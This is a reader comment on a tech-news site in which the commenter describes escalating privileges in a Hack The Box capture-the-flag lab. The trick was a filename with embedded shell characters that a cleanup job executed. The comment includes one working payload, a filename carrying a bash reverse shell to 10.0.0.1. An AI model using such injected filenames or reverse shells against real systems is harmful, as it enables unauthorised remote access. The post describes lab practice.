Reply to post: Re: Broken NFS

A 1970s magic trick: Take a card, any card, out of the deck and watch the IBM System/370 plunge into a death spiral

el_oscuro
Linux

Re: Broken NFS

Everything old is new again. Working on CTF in Hackthebox, I had a reverse shell but couldn't really do anything with it. There was only one log directory that was writeable, but I eventually figured out there was a cleanup job that deleted the files. By creating a filename with shell characters in it, I was able to get command execution with higher privileges when that process ran by naming the files something like:

hello.c; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

The hard part was figuring out how to get the special characters in the name. I don't remember what I had to do, but it can definitely be done.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon